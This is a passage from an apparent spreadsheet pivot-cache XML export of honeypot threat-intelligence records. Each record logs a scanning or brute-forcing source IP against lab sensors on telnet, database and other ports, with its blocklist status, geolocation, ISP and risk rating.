    <s v="25.5952"/>
    <s v="16223"/>
    <s v="MAXNET TELECOM, LTD"/>
    <s v="MAXNET TELECOM, LTD"/>
    <s v="business"/>
    <s v="Lanet Network Ltd"/>
    <s v="2012-06-01"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="NA"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:53a:dd0"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3271"/>
    <x v="3271"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T20:21:45"/>
    <d v="2025-03-26T16:33:22"/>
    <d v="2025-04-03T20:21:45"/>
    <n v="8"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H2"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NTW"/>
    <s v="Tsuen Wan"/>
    <s v="NA"/>
    <s v="Kwai Chung"/>
    <s v="1819595"/>
    <s v="NA"/>
    <s v="22.3615"/>
    <s v="114.133"/>
    <s v="137872"/>
    <s v="China Mobile Hong Kong Company Limited"/>
    <s v="China Mobile Hong Kong Company Limited"/>
    <s v="cellular"/>
    <s v="China Mobile Hong Kong Company Limited"/>
    <s v="2005-03-30"/>
    <s v="PEOPLESPHONE-HK"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3a52:dfb4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3272"/>
    <x v="3272"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T19:51:03"/>
    <d v="2025-04-03T17:22:19"/>
    <d v="2025-04-03T19:51:03"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H13"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2004-09-06"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b59:bf03"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3273"/>
    <x v="3273"/>
    <s v="hydrogen231-ext2.ahrefs.net"/>
    <x v="0"/>
    <d v="2025-04-03T19:50:42"/>
    <d v="2025-04-03T19:50:42"/>
    <d v="2025-04-03T19:50:42"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Brute Force"/>
    <s v="medium"/>
    <s v="SMA-LAB_corporatelogin_Login.NIPPONINDIAIM_HC1"/>
    <s v="443"/>
    <s v="True"/>
    <s v="{'cbl.abuseat.org': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="72"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="high"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="FR"/>
    <s v="France"/>
    <s v="HDF"/>
    <s v="Hauts-de-France"/>
    <s v="North"/>
    <s v="Roubaix"/>
    <s v="2982681"/>
    <s v="59100"/>
    <s v="50.6917"/>
    <s v="3.20157"/>
    <s v="16276"/>
    <s v="OVH"/>
    <s v="Ovh Sas"/>
    <s v="hosting"/>
    <s v="Ovh"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login"/>
    <s v="{HTTP_LOGIN:Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2012-03-20 08:05:47"/>
    <s v="2030-03-20 08:05:47"/>
    <s v="2024-05-20 07:51:02"/>
    <s v="['ADAM.NS.CLOUDFLARE.COM', 'YOLANDA.NS.CLOUDFLARE.COM']"/>
    <s v="Name.com, Inc."/>
    <s v="['clientTransferProhibited https://icann.org/epp#clientTransferProhibited', 'clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited']"/>
    <s v="REDACTED FOR PRIVACY"/>
    <x v="37"/>
    <s v="NA"/>
    <s v="PO Box 1769"/>
    <s v="::ffff:3624:94e7"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Medium"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3274"/>
    <x v="3274"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T19:48:28"/>
    <d v="2024-03-29T13:50:58"/>
    <d v="2025-04-03T19:48:28"/>
    <n v="781"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H5&amp;&amp;SMA-LAB_MT-CPA_H42&amp;&amp;SMA-LAB_IPP_H31&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_PJL_H26&amp;&amp;SMA-LAB_POSTGRES_H28&amp;&amp;SMA-LAB_SOCKS5_H5&amp;&amp;SMA-LAB_SMB_H37&amp;&amp;SMA-LAB_RDP_H25&amp;&amp;SMA-LAB_HTTPS_H16&amp;&amp;SMA-LAB_SIP_H4&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;25819&amp;&amp;631&amp;&amp;5900&amp;&amp;9100&amp;&amp;5432&amp;&amp;1080&amp;&amp;445&amp;&amp;3389&amp;&amp;443&amp;&amp;5060&amp;&amp;52887&amp;&amp;3306&amp;&amp;1433"/>
    <s v="True"/>
    <s v="{'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Gurugram"/>
    <s v="Gurugram (Sector 44)"/>
    <s v="1270642"/>
    <s v="NA"/>
    <s v="28.4498"/>
    <s v="77.0761"/>
    <s v="24186"/>
    <s v="RailTel Corporation of India Ltd."/>
    <s v="RailTel Corporation"/>
    <s v="business"/>
    <s v="RAILTEL"/>
    <s v="2015-11-10"/>
    <s v="RAILTEL-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ca8c:830d"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3275"/>
    <x v="3275"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T19:43:49"/>
    <d v="2025-04-03T19:43:49"/>
    <d v="2025-04-03T19:43:49"/>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c:15a9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3276"/>
    <x v="3276"/>
    <s v="NA&amp;&amp;bb220-255-250-215.singnet.com.sg"/>
    <x v="0"/>
    <d v="2025-04-03T19:29:31"/>
    <d v="2025-04-03T19:12:27"/>
    <d v="2025-04-03T19:29:31"/>
    <n v="14"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="SG"/>
    <s v="Singapore"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="Singapore (Queenstown Estate)"/>
    <s v="1880252"/>
    <s v="NA"/>
    <s v="1.29229"/>
    <s v="103.808"/>
    <s v="9506"/>
    <s v="Singapore Telecommunications Ltd, Magix Services"/>
    <s v="Singapore Telecommunications Ltd, Magix Services"/>
    <s v="business"/>
    <s v="SingNet Pte Ltd"/>
    <s v="2003-06-24"/>
    <s v="SINGNET-SG"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="1995-06-14 16:00:00"/>
    <s v="2025-06-14 16:00:00"/>
    <s v="2024-07-14 16:02:49"/>
    <s v="['ns1.singnet.com.sg', 'ns2.singnet.com.sg']"/>
    <s v="Singnet Pte Ltd"/>
    <s v="ok https://icann.org/epp#ok"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dcff:fad7"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3277"/>
    <x v="3277"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T19:28:42"/>
    <d v="2025-02-21T16:08:10"/>
    <d v="2025-04-03T19:28:42"/>
    <n v="11"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Incomming Traffic&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="AP"/>
    <s v="Andhra Pradesh"/>
    <s v="Anakapalli"/>
    <s v="Anakapalle"/>
    <s v="1278688"/>
    <s v="NA"/>
    <s v="17.6913"/>
    <s v="83.004"/>
    <s v="138752"/>
    <s v="Starone Broadband Private Limited"/>
    <s v="Starone Broadband Private Limited"/>
    <s v="business"/>
    <s v="Starone Broadband Private Limited"/>
    <s v="2019-04-08"/>
    <s v="SOBPL"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:678a:12b"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3278"/>
    <x v="3278"/>
    <s v="125-228-31-29.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T19:25:02"/>
    <d v="2024-08-11T08:21:00"/>
    <d v="2025-04-03T19:25:02"/>
    <n v="462"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_SMB_H25&amp;&amp;SMA-LAB_SOCKS5_H21&amp;&amp;SMA-LAB_SSH_H5&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_LDAP_H7&amp;&amp;SMA-LAB_PJL_H24&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H19"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;23&amp;&amp;445&amp;&amp;1080&amp;&amp;22&amp;&amp;80&amp;&amp;389&amp;&amp;9100&amp;&amp;39299&amp;&amp;42357&amp;&amp;63654&amp;&amp;42413&amp;&amp;42374"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7de4:1f1d"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3279"/>
    <x v="3279"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T19:07:29"/>
    <d v="2025-04-03T19:07:29"/>
    <d v="2025-04-03T19:07:29"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Nuh"/>
    <s v="Chandīgarh"/>
    <s v="9915976"/>
    <s v="160017"/>
    <s v="30.7333"/>
    <s v="76.7794"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75db:464c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3280"/>
    <x v="3280"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T18:40:44"/>
    <d v="2025-04-03T18:40:44"/>
    <d v="2025-04-03T18:40:44"/>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d9:5d82"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3281"/>
    <x v="3281"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T18:18:14"/>
    <d v="2025-03-21T19:50:14"/>
    <d v="2025-04-03T18:18:14"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_HC1"/>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business"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d0:d508"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3282"/>
    <x v="3282"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T18:14:55"/>
    <d v="2023-12-02T07:54:00"/>
    <d v="2025-04-03T18:14:55"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="21500&amp;&amp;1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Pocket HL)"/>
    <s v="1261481"/>
    <s v="110049"/>
    <s v="28.6252"/>
    <s v="77.1037"/>
    <s v="135834"/>
    <s v="Multicraft Digital Technologies Private Limited"/>
    <s v="Multicraft Digital Technologies Private Limited"/>
    <s v="business"/>
    <s v="Multicraft Digital Technologies Private Limited"/>
    <s v="2016-11-29"/>
    <s v="MULTIFI"/>
    <s v="None"/>
    <s v="NA&amp;&amp;connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6750:746b"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3283"/>
    <x v="3283"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T18:13:45"/>
    <d v="2024-06-28T19:18:39"/>
    <d v="2025-04-03T18:13:45"/>
    <n v="16"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_IRC_H9&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_POSTGRES_H33&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_HTTPS_H39&amp;&amp;SMA-LAB_SMTP_H33&amp;&amp;SMA-LAB_SMTP_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;51381&amp;&amp;45584&amp;&amp;6667&amp;&amp;80&amp;&amp;5432&amp;&amp;5900&amp;&amp;443&amp;&amp;25&amp;&amp;53137&amp;&amp;50930"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3833"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="2023-09-07"/>
    <s v="PAN-22"/>
    <s v="2023-09-07"/>
    <s v="connection&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': '', 'data': 'None'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:93b9:8545"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3284"/>
    <x v="3284"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T18:01:58"/>
    <d v="2025-04-03T18:01:58"/>
    <d v="2025-04-03T18:01:58"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="NA"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="45899"/>
    <s v="VNPT-AS-VN"/>
    <s v="Vnpt"/>
    <s v="corporate"/>
    <s v="Vietnam Posts and Telecommunications Group"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:eed:e02d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3285"/>
    <x v="3285"/>
    <s v="ppp-171-96-203-165.revip8.asianet.co.th&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T17:59:21"/>
    <d v="2025-04-03T17:38:13"/>
    <d v="2025-04-03T17:59:21"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="3306&amp;&amp;1433"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
    <s v="10"/>
    <s v="Bangkok"/>
    <s v="Ratchathewi"/>
    <s v="Ratchathewi"/>
    <s v="7026885"/>
    <s v="NA"/>
    <s v="13.759"/>
    <s v="100.534"/>
    <s v="17552"/>
    <s v="TRUE INTERNET CORPORATION CO. LTD."/>
    <s v="True Internet Corporation CO. Ltd."/>
    <s v="residential"/>
    <s v="Truenet Hisp"/>
    <s v="2011-03-07"/>
    <s v="TRUENET-HISP"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="['CLARINET.ASIANET.CO.TH', 'CONDUCTOR.ASIANET.CO.TH', 'PIANO.ASIANET.CO.TH']"/>
    <s v="THNIC"/>
    <s v="ACTIVE"/>
    <s v="None"/>
    <x v="21"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:ab60:cba5"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3286"/>
    <x v="3286"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T17:55:38"/>
    <d v="2025-04-03T17:53:05"/>
    <d v="2025-04-03T17:55:38"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="AR"/>
    <s v="Argentina"/>
    <s v="A"/>
    <s v="Salta"/>
    <s v="Departamento de Orán"/>
    <s v="Orán"/>
    <s v="3836620"/>
    <s v="NA"/>
    <s v="-23.1371"/>
    <s v="-64.3243"/>
    <s v="7303"/>
    <s v="Telecom Argentina S.A."/>
    <s v="Telecom Argentina S.A."/>
    <s v="business"/>
